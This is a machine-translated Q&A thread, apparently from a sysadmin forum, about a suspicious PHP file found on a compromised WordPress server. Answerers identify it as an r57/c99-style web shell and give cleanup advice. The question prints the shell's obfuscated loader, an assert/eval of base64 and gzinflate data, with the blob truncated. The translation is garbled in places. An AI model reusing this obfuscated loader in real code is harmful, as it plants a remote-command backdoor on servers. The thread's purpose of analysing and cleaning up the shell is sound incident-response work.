发现一个奇怪的文件,我们没有创build在我们的目录之一。
它被命名为“.moreinfoege.php.KJt”在目录中,我们也有一个名为moreinfo.php的文件
我们最近一直有服务器问题(WordPress黑客攻击,DDoS攻击),所以我们对其他渗透事件高度警惕。 这是一个黑客? 它有什么方法可以得到?
这是什么内容看起来像(冗长的乱码string缩写适合在这里):
<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?> 代码隐藏了它正在做assert(base64_decode(文本从'ZXZ到W ==')的事实。
该文本的解码显示另一个string正在做另一个解码和解压开始与eval(gzinflate(base64_decode("5b3pe …
没有完整的代码张贴,我不能看到什么是在兔子洞的尽头。 您可以使用此网站解码每一步:
http://www.webutils.pl/index.php?idx=base64 (注意:文本在蓝色框中。)
这个链接应该有助于第二部分: http : //www.tareeinternet.com/scripts/decrypt.php
更新:基于完整的文件,这似乎是r57shell或c99shell的变种。 它为您的服务器提供了一个Web界面来执行诸如执行命令行操作和与SQL数据交互等操作。
这个网站有一个例子: http : //phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/
这个网站有一个也有问题的人的博客文章: http : //basus.net/?p=19
它看起来像是base64编码的PHP,这使得很难弄清楚发生了什么事情 – 但是很难说如果不能访问这两个文件。 我愿意赌大量的巧克力,您的主机仍然受到威胁。
根据攻击者先前获得的访问方式以及如何从中恢复,可能存在遗留的访问方法。
我build议你开始你的恢复程序 – 安装一个新的操作系统,并从一个已知的好副本恢复你的网站。
看起来像一个黑客。 最近stream行的获取这类文件的方法之一是通过ftp。
有很多木马从热门的Windows FTP客户端捕获密码[如总指挥]。 凭据报告控制节点直接或从其他受感染的机器附加恶意js / php代码索引文件,上传恶意.htaccess文件等
检查文件的创builddate,尝试与您的托pipe服务提供商交谈,以便在此file upload时获得ftp日志。
在安全的一面… – 如果是wordpress – 备份数据和代码; 删除所有的PHP文件,审查所有模板,从新版本恢复应用程序。